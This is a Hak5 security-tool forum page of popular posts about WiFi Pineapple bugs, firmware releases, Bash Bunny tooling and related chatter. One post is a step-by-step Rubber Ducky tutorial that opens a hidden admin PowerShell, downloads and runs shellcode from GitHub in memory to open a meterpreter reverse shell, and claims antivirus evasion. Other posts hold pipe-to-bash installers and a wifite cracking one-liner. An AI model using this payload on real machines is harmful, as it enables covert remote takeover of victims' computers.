Popular Content

Showing content with the highest reputation since 05/26/2017 in all areas

  1. 8 points
    Hi @RazerBlade, I'm sorry you are not satisfied with the WiFi Pineapple. I haven't been able to spend a lot of time on the WiFi Pineapple lately, because I was focusing on other Hak5 products. That's why you haven't seen any firmware or system module updates. In terms of bugs, I am aware that some exist, but you should know that only a small subset of our users experience them, which make them hard to track down. Once I pick up the WiFi Pineapple again, I'm going to go over every Module (maybe one a week) and rid it of bugs and usability issues. I'll also be launching RCs to ensure that the shipped firmware upgrades are solid and "bug free(tm)". For now though, I'm truly sorry you are unhappy with the current state of the WiFi Pineapple. I hope that over the next few weeks and months we can remedy this.
  2. 6 points
    Wifi Pineapple - Themes Github: https://github.com/kbeflo/pineapple-themes Dark Theme Install: wget -qO- https://raw.githubusercontent.com/kbeflo/pineapple-themes/master/dark/install-dark.sh | bash Screenshots:
  3. 5 points
    Yup, that's it. I have it working but it's a bit slow. There are some tricks to speed it up though, so once I finish that, I'll push out a new firmware.
  4. 5 points
    Hey everyone, Recently I have seen a lot of questions in regards to installing tools on the Bash Bunny. This post will contain a list of .deb files published by Hak5. Please see our wiki for installation instructions. If you would like to suggest a tool to be published, please reply to this thread. All other posts will be removed. Impacket Responder Gohttp Disclaimer: Hak5 is not responsible for these tools. They are 3rd party packages and have not been checked for stability or security. Hak5 simply packages these tools for easy installation.
  5. 5 points
    Hey Everyone, As is likely apparent from the name, Buffalo Bulldozer is a rock solid release with the intent of synchronizing a stable base for both WiFi Pineapples in the 6th generation - the NANO and TETRA. We've implemented some major improvements to the Recon mode of the PineAP engine, both increasing accuracy as well as stability. Recon scans now gather both AP and Client information by default using only one radio. This change decreases wlan0 overhead, allowing for faster association responses and uninterrupted communication with connected clients. WPS detection has also been added to Recon, further adding to the at-a-glance visibility of the wireless landscape. Information gathering is also enhanced from the Recon view with each client's probe requests visible from their respective menus, meaning you'll be able to immediately identify targets without having to page over to logs. TETRA users will appreciate the enhanced 5GHz support in both Recon and PineAP for both scans and deauthentication. Under the hood the kernel has been updated, upstream wireless fixes have been applied and packages have been updated. We feel you'll find this release rock solid throughout and we're eager to hear your feedback. Please as always use the bug tracker from https://www.wifipineapple.com/bugs This major release paves the way for an upcoming "CC" version and its accompanying cloud infrastructure. We're excited to share these developments as the project progresses. Once again thank you all for your support. This is truly the best time to be a WiFi Pineappler and we're grateful for this community!-- Seb & Darren Changes can be found at https://www.wifipineapple.com/downloads#tetra.
  6. 4 points
    MANA-Toolkit! Pineapple NANO + TETRA. (IPK installation-files, and source-files ready to compile with OpenWRT-SDK) MANA Toolkit also includes a working version of SSLstrip2+dns2proxy for the Pineapples. (Which you cannot find anywhere else) Last update: 07.05.2017 Changelog: Lots of small changes. The biggest being that the attack will now go into the background. And can be killed later again. Added a limit of 8 simultaneously active clients connected at a time, to not crash the device. This can be customized within: "hostapd-mana.conf" It could happen that this number needs to be reduced on the NANO. If you experience the NANO not responding, try lowering the number. SSLstrip2, SSLsplit, dns2proxy, crackapd, net-creds, firelamb and every part of the MANA-Toolkit comes with the package. (Even aslEAP) Install procedure: root@Pineapple:~# wget -qO- https://raw.githubusercontent.com/adde88/hostapd-mana/master/INSTALL.sh | bash -s -- -v -v How do i start MANA? Make sure you are not using wlan1 for anything. If you are, hostapd-mana will not be able to set the interface to 'master' mode Type 'launch-mana' in the terminal to launch the attack. The attack will go silently into the background while at the same time giving output to the screen and log-files. root@Pineapple:~# launch-mana Type 'kill-mana' in the terminal to stop the attack. root@Pineapple:~# kill-mana Module: https://github.com/adde88/ManaToolkit I have released a pre-release version of the Mana Toolkit "Module" for the Pineapples. This lets you launch the attack from the Pineapples web-interface. General feedback or tips for improving the module are greatly appreciated! Github repo. + source-codes: https://github.com/adde88/hostapd-mana-openwrt https://github.com/adde88/hostapd-mana https://github.com/adde88/ManaToolkit (NEW BLEEDING-EDGE / DEV. BRANCH IS UP) The first repo. contains the IPK files you need to install everything, but it also contains the files you need to build it yourself with a proper SDK. The second repo. is used by the SDK. The SDK Makefile will download everything it needs from the github repo. to build the MANA-Toolkit package. You don’t need to touch the second repo. to get anything up and running. (OpenWRT-SDK handles this automatically.) The third repo. is the Mana Toolkit "Module", that needs testing and feedback from you guys. It also has a new dev-branch that contains my latest fresh changes, but it's not as stable as the master branch. Important directories: Config files: /etc/mana-toolkit/ Log files: /pineapple/modules/ManaToolkit/log (This is the log-directory, even if you don't have the Module installed) You will find the usual MANA Tools at: /usr/share/mana-toolkit/ OPKG Installation Files: (For those who want to install it manually) https://github.com/adde88/hostapd-mana-openwrt/raw/master/bin/ar71xx/packages/base/asleap_2.2-1_ar71xx.ipk https://github.com/adde88/hostapd-mana-openwrt/raw/master/bin/ar71xx/packages/base/hostapd-mana_2.6-3_ar71xx.ipk https://github.com/adde88/hostapd-mana-openwrt/raw/master/bin/ar71xx/packages/base/hostapd-mana_2.6-dev-3_ar71xx.ipk (dev. version - contains a new test-feature, that allows attacking specific targets only)
  7. 4 points
    Instead of hacking their system, maybe take the time to learn about it, if it is bluetooth, ask someone at the school. Brush up on your SE skills, talk to the system people that run the PA system, learn about it, and if it is bluetooth, ask them of you can test something, such as connecting to it. Then show them if you find a flaw. This whole "how do I hack my school" isn't so much black hat or white hat. Its how and what you do. If you act maliciously as in "I want to hack my school" without purpose, ie: malicious intent, then no, we don't condone that, but surely can't stop you. But if it's "I want to know how this system works and what I can do with it, can I test this theory xyz" and you're working with someone from staff or the school, then it's a different situation. As I say a lot, learning is not a crime. What you do may be, and that is on you. How you go about it, makes the world of difference. Tinkering and curiosity is how we learn. Just be responsible, and in all situations, cover your bases, because if some ass hat at school turns around and does it maliciously after you show them how it's done, you're the one going to get in trouble if you aren't going through the right channels and being up front about it. Hopefully they encourage you to learn about it in the process, vs getting yourself into trouble.
  8. 3 points
    I like that idea. I'll see what I can make happen.
  9. 3 points
    Did you happen to read this already? https://forums.hak5.org/index.php?/topic/28824-faq-frequently-asked-questions/ Or watch this one? https://youtu.be/NeDYD9nb7PM That came from this page: http://usbrubberducky.com/#!resources.md
  10. 3 points
  11. 3 points
    Cement.... cement your usb ports, all of them lol.
  12. 3 points
  13. 3 points
    We'll hopefully have more details on this later, and should have an official solution for this too. I don't think mounting the Bash Bunny to the WiFi Pineapple is the best way to handle communication, that's what CDC_ETHERNET is for. We can handle file transfers and C&C that way. The idea is that you'd be able to offload heavier tasks such as running mitmf, bettercap, poisiontap, and more to the Bash Bunny, which requires a bit of fancy routing. Anyway, it's one of the next things on my list.
  14. 3 points
    About 6 to 8 months after 9/11, I was deployed to the giant sandbox. We made an overnight stop somewhere and went through a civilian airport to get back to the jets. Now these are military refuelers, which are also cargo planes. We had crates with our helmets, armor, and rifles onboard already. We fly in uniform, so most of us have pocket knives in our pockets and leatherman tools on our belts. The morons at the gates took our knives. Can't have us taking over the planes!! TSA and Homeland Security is a joke.
  15. 3 points
    There are also masks that can help. Especially when a vender has a set default, like 8 numbers. And you have attacks like WPS Pins, and Pixie.Also tools like WiFiphsher, And sure it could take time, but I usually just start it before I go to bed, when I wake either I have the password or I don't. And even if I haven't captured the handshakes yet, I can still be generating tables overnight. I could be generating the times at home, while I'm out sniffing the handshake. With enough password modulation, you could get any password. The main thing is the time it takes to do it. I used to keep a list of the top 1000 ap passwords on my mk5. It would take about 30 seconds for the pineapple to go through them. Set up a dip switch for airmon-ng start wlan1 && wifite-ng -all -mac -strip -aircrack -dict 1000.txt -crack -i wlan1mon And suddenly you have a WiFi autopwn device. Flip the power switch, set it down, and wait for it to do it's thing. It might not be very fast or work all the time, but I don't believe bruteforce is dead.
  16. 2 points
    I can almost certainly confirm that coptersafe is only adjusting fc parameters and not rooting the device. It also doesn't update the device as mentioned before.
  17. 2 points
    no i am saying to choose one or the other, but only with one attack mode (ethernet OR storage; not both)
  18. 2 points
    I can try that as well when I get my rig set up. Probably be Monday.
  19. 2 points
    Ok. So I did some testing this morning and this is what I came up with (it has been hectic at work today so I haven't been able to post until now): This was using an Alpha AWUS036 and monitoring the output (from another device - Mikrotik) and also monitoring the power going to the Raspberry pi 2 Here was my setup: My Pi, Mikrotik mAP and Alpha AWUS036 With antenna on - this was steady and remained the same through the duration (increasing txpower on antenna from 100mw to 1000mw) At 100mw At 1000mw So, just running the command 'ifconfig wlan0 down' Does turn off the Green LED on the device and monitor no longer registers Input power is greatly reduced (This stayed like this until turning the interface back on) It really appears that using ifconfig (could be used in whatever shell scripts you are using / cron / etc.) actually cuts the power to the device or at least puts it into a very low power state. Hope these findings help you on your journey!
  20. 2 points
    Dbum successfully helped me fix this. Massive massive props to that guy!!! He told me to route del gw turtle.lan which allowed my kali to use the wifi as its main connection again... And then I just went ahead and ran the turtle.sh script and it worked! Thank you sir.
  21. 2 points
    I'll just leave this here...
  22. 2 points
    That's because arming mode doesn't start Ethernet. Once we have AUTO_ETHERNET working that will change.
  23. 2 points
    I can barely remember my own phone numbers...
  24. 2 points
    The WPNano traffic is being routed through his laptop which is running Bettercap. Its not on the WPnano itself.
  25. 2 points
    It should be the other way around. RNDIS is a windows specific protocol that has support in Linux (though if you look at the source files, you will find comments on how it's kind of hacky). ECM ethernet is the way to go on Linux operating systems. I have yet to see a full distribution that doesn't support ECM out of the box but supports RNDIS.
  26. 2 points
    Hello there! I recently purchased my WiFi Pineapple after purchasing the Bash Bunny and the Rubber Ducky because the tools were excellent and well maintained. I thought it would be this great seamless experience with the pineapple as the other Hak5 devices but I was wrong. To begin with, the device and it's software is filled with bugs and the latest release was about 7 months ago! Of course the bugs may not break the device completely but it adds to a bad user experience where you realize you can't use a sdcard to install modules because of a kernel bug. Numerous bugs I have encountered are random shutdowns, recon stuck at 100%, pineap not starting or stopping and this is also present in many modules. This makes the device in a way useless because when you want to try to use because the bugs are always ruining the attack. Most of the bugs I have encountered are on the bugs tracker list and an ETA from Hak5 when the next firmware release would be highly appreciated! The problems may be hardware based but because the are already on the bug tracker list, I doubt it.
  27. 2 points
    Sorry - our policy is not to help or encourage the distribution of phishing pages, especially not if they are specific to social media or banking. You are welcome to ask questions regarding a captive portal, but I will lock this thread for now.
  28. 2 points
    Hello again friends! Today I will give a tutorial on how to create a payload that executes under 10 seconds and gives you a fully functioning meterpreter shell back to your kali linux machine. This is done under 20 lines of script. It's quite simple and works on any Windows machine with Powershell installed (Windows 7 and above comes preinstalled with this). I tested this first on my Windows 10 machine and works like a charm, fully undetected by antivirus since it writes the script to memory, not to the disk. Let's begin shall we? Step 1: Fire up Kali Linux and open a terminal. And using msfvenom we are going to create a shellcode. Enter this code: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=XXX LPORT=XXX -f powershell > /root/Desktop/shellcode.txt The first part "msfvenom" indicates that we are using that specific tool. The -p parameter indicates what payload we are using. Change the "XXX" for the LHOST parameter to your Kali Linux machine, open a terminal and enter "ifconfig" if you are unsure. As for LPORT, you can use whatever you want. Typically you use 443, 8080, 4444. They all work. The -f parameter writes the shellcode in powershell format (obviously since we're using powershell). And the last part after the ">" indicates the location where this payload will be saved in. STEP 2: Now we are going to upload the shellcode to github or pastebin (whichever you prefer). Create a github account if you do not have one at https://github.com/join?source=header-home. After doing that, make a new repository on github and then upload the payload you just made (there are tutorials on google for uploading files). You can upload the file a couple different ways. The easiest is just log on github from your kali machine and upload from there. Or you can save the payload on a USB stick or somehow transfer it to your host machine and upload from there. Or if you use pastebin, upload to that! STEP 3: Now the fun part! Time to code the ducky. Copy and Paste my code and change the corresponding lines. DELAY 500 GUI x DELAY 1000 a DELAY 1000 ALT y DELAY 1000 STRING powershell -WindowStyle hidden ENTER DELAY 1000 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1') ENTER DELAY 1000 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/GunZofPeace/PowerSploit/master/Scripts/Meterp') ENTER DELAY 1000 STRING Invoke-Shellcode -Shellcode ($buf) -Force ENTER What is going here in we are calling the windows + x button, then typing "a", which opens the CMD with admin privileges. Which is awesome for us. It then fires up the command to start up powershell, BUT IT OPENS IT UP HIDDEN. So the actual powershell window is hidden!!!!!!! The only way to see it is running is through Task Manager. Which is good for us :) After powershell is started up, it downloads the command "Invoke-Shellcode" and injects it into memory. Which doesn't do much by itself. You want to keep this line the same as mine! Copy and paste it exactly. Only for the first IEX string. Now, the second IEX string, you want replace the last link with whatever the link is to your script is on your github account. Remember the one you uploaded? You want to click on github, the button that says "Raw" and get that link! Then replace it between the two apostrophes. Lastly, the last line of code actually executes the payload and this is where you get your shell back on your listener. Or if you used pastebin, just place that link into the code. To set up the listener, open up a terminal in Kali. >msfconsole >use exploit/multi/handler >set payload windows/x64/meterpreter/reverse_https >set LHOST XXX (whatever IP you used, which would be your kali machine IP) >set LPORT XXX (whatever port you used) >exploit And there you go! Of course, have your listener before doing the attack. If you have any questions, please comment! this is my first actual tutorial, so feedback is wanted.
  29. 2 points
    Who...this is dark.. You meet some travelers.. They say hello.. Suddenly you're stuck on something You have reached, the deep web...
  30. 2 points
    I don't see a print-screen
  31. 2 points
    Get a lawyer. Find out if your rights were violated and they broke any laws or company policies. If the job is that important, be prepared to take it to court. Otherwise, start looking for a new job.
  32. 2 points
    Venting is understandable (to an extent), but without all the info and context(which should be directed to the shop, not the community forums), no one can help you(nor will we take sides here). Forums are not exactly here for shop support, and other than Seb once in a while fielding some to try and help(He's in Australia too, and not support for the shop) there isn't much we can do other than recommend you take a breather and wait for their response. Best we can tell you is send "one" email, wait, respond, and deal with it rationally. More emails you send, longer your wait in the queue. There are like 2 people that handle all the shop stuff. If you need to return it, then do so, they are generally good with returns, but we don't know what your problem is, and I gather neither does the shop at this point or things would be worked out. If it's help you need in getting the pineapple to work, or re-flashing, fixing something that is not working, etc, try the Pineapple section for help, but understand, the forums are NOT customer service.
  33. 2 points
    https://astr0baby.wordpress.com/2017/05/23/bashbunny-with-metasploit-ms17_010_eternalblue-vs-windows-7-sp1-x64/ going to try and setup msf this way and see if that will change anything.
  34. 2 points
    I thought I'd share this, my wife said to me you might as well order that bouncing bunny your after! after some investigation we worked out she met the bash bunny, Then this morning she asked me when my bunny boiler will arrive? I give up (lol)
  35. 2 points
    Good luck getting a *NIX machine to cough up creds with responder. This is mainly to be used against Windows devices that just love to share stuff. Unless you have some service setup to forward some cached creds, *nix will most likely prompt if it needs creds, not pass the local user creds. So on Windows it pretending to be a 2GB network it basically puts windows into a authtrap where anything send will ask for creds which windows will cough up the current user usually unless it is patched and reg setting is set to not to. Nix will ask you for creds to send unless it is creds you already put in and is still alive (You have them set to remember forever or while you are logged on instead of for a specific session). Even then it will only be for that url or unc but the BB authTrap will respond to it in which it will get those hashed creds then.
  36. 2 points
    I do face occasional issues when using the GUI and it usually can be solve either by a power reset or factory reset. Sometimes Recon scan will hang at 100%, other times PineAP will not work as intended. Generally SSH into the device will offer a more reliable experience. Furthermore with the console mode you are able to debug what exactly is wrong. Also when you are facing too many issues it could be that the firmware wasnt updated properly, thus a firmware recovery might come handy.
  37. 2 points
    Can't even delete modules now! Come on guys, step up the mark, perhaps you should focus on getting the products you have already sold to customers in decent shape before turning your back on them to focus on bringing in more money with the next product. Alternatively, if you dont provide after sales support could you provide me with a product thats stable out of the box.
  38. 2 points
    Yep, my Nano is pretty useless to me right now with such erratic behaviour. Where is the product support? No updates provided in months and so unstable, 75% of my time is spent fault finding rather than playing with the product. Seems pretty worthless to me. When you consider it's sold as a tactical field device, it seems pretty ridiculous. How could this be used in the field when it's so unreliable. You would get home every time to find no data or it had locked up! I only bought it for experimenting at home, but it's just a nano doorstop right now. How a product can be sold like this with so many bugs and no with no proactive work be provided to iron out these bugs is beyond me. Can someone recommend a stable firmware please. Alternatively, if as stated above only a small subset of your users experience bugs perhaps I could have my unit replaced with one that works in the same manner as the large subset who dont experience bugs!
  39. 2 points
    I have to agree that the vast majority of the time I have spent with my pineapples has been in troubleshooting, factory resetting, re-flashing, etc. The tool has great promise; but has never been stable for me in any true long term or feasible "deployment" sense. It has been fun to play with, while I'm not screaming at it for bugs I am fighting with; but I have never gotten any iteration to function in a consistent and stable way...and my first pineapple was a fon I built myself. So, I'm not talking about a passing fancy here. I've been involved with these things all the way up to the Mark V. Given my issues, and the fact that support for older models drops off very quickly, I just cant justify purchasing either of the newer models. Sad :(
  40. 2 points
    I love the products and I'm sure alot of them were sold so maybe it's time to hire another developer to help you out. Yea my nano is also almost useless right now as well and I have the same issues :( you guys need to hire someone to work on each project not ditch the Main one (pineapple)that got you big because the rubber ducky got shown on Mr robot. I understand you want to Switch to rubber ducky while everyone's still talking about It but with as many people who bought this you need to hire some more people.
  41. 2 points
    In all honesty, you don't. You reset the password, and since it's your account you can do that with no issues.
  42. 2 points
    The best thing about that news article is that they took the time to detain him and press him for his phone's PIN, took 30 minutes grabbing all the data off of it, and then proceeded to NOT check his bags or person. I find that at least slightly evident of the fact that these exercises are not designed for 'our safety' against 'terrorists' at all, and are more aimed at eating away at our rights to privacy. George Orwell is spinning in his grave.
  43. 2 points
    Dunno about a War Rig :D but I pimped my old laptop with a Ono Sendai sticker. Now bring out your best ice breaker and simstim to kill that Blackice!! Ono what the hell!?? Google it! Highly addictive, ordering stickers online
  44. 2 points
    Try this on your Kali VM ifconfig eth1 netmask up ping ^^ where eth1 == the interface of your NANO That won't setup Internet connection sharing, but it will show that your Kali box can get on the same network as the NANO.
  45. 1 point
  46. 1 point
    Check out this thread.
  47. 1 point
    The best way I have found to setup wp6.sh is using the manual option. In the above your HOST IP Address is not, it should be the IP address of the PC itself, everything else looks right. Kali linux will set your pineapple as the active Internet connection when you plug it in, go to settings and network to change it back. for some reason Kali doesnt like to let 2 eth0 or eth1 both be on at the same time.
  48. 1 point
  49. 1 point
    No. He's connected to the wireless control ap the pineapple creates. Don't forget, that bank job was over a year ago.
  50. 1 point
    Hi @newbi3, I've been looking at the iptables rules to create a captive portal. Because the PineAP runs OpenWrt, there are some predefined rules that interfere with yours. So I've written a script that creates the iptables rules. https://pastebin.com/zZhzqf91 ./portal.sh init -> will initialise the captive portal ./portal.sh purge -> remove all the rules, but keep OpenWrt ones ./portal.sh add/remove IP -> authorise a user HTTP (80) is successfully redirected to port 80 on the PineAP. HTTPS (443) is dropped and DNS is accepted (you can also redirect locally). I can't find a way to have HTTPS redirections to work without a certificate error or a protocol error if you redirect to port 80. Hope it helps :) (I fixed SSH and PineAP manager address, now it works)